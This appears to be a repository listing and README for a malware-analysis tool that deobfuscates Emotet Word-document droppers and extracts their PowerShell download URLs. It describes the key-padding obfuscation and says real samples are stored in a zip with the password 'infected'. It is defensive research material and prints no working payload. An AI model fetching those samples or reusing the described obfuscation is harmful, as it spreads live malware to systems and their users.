https://github.com/jstrosch/emotet-droppers-fall2019

Python3 script that deobfuscates and then decodes base64 string that contains PowerShell script and extracts the URLs used to download Emotet binaries
https://github.com/jstrosch/emotet-droppers-fall2019

Last synced: 6 months ago
JSON representation

Python3 script that deobfuscates and then decodes base64 string that contains PowerShell script and extracts the URLs used to download Emotet binaries

• Host: GitHub
• URL: https://github.com/jstrosch/emotet-droppers-fall2019
• Owner: jstrosch
• Created: 2019-11-28T03:11:53.000Z (over 5 years ago)
• Default Branch: master
• Last Pushed: 2020-01-28T16:43:43.000Z (over 5 years ago)
• Last Synced: 2024-10-31T01:13:26.607Z (8 months ago)
• Language: Python
• Size: 20.4 MB
• Stars: 3
• Watchers: 3
• Forks: 2
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# Deobfuscate Emotet Droppers - Fall 2019

Python2 script that deobfuscates and then decodes base64 string that contains PowerShell script and extracts the URLs used to download Emotet binaries. 

These Word documents originally started appearing when Emotet resumed operations in the Fall of 2019 as simple base64 encoded strings that contained PowerShell to download the Emotet binary. Later, the base64 strings were padded with a "key" that was replaced at run time. The key also began with a simple pattern but has become slightly more complex over time, to include splitting the key with the key so that it requires multiple rounds of replacement.

Sample documents are contained in the _samples_ folder, the password for the zip is _infected_.

## Sample Output

![alt text](https://github.com/jstrosch/emotet-droppers-fall2019/blob/master/sample-output.png "Sample Output")

## Subject to Change

As is likely no surprise, the padding/key will evolve over time requiring updates to this script.